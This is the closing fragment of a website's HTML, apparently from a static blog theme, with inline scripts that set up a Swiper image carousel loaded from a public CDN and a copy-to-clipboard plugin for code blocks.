    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->

</div></body></html>
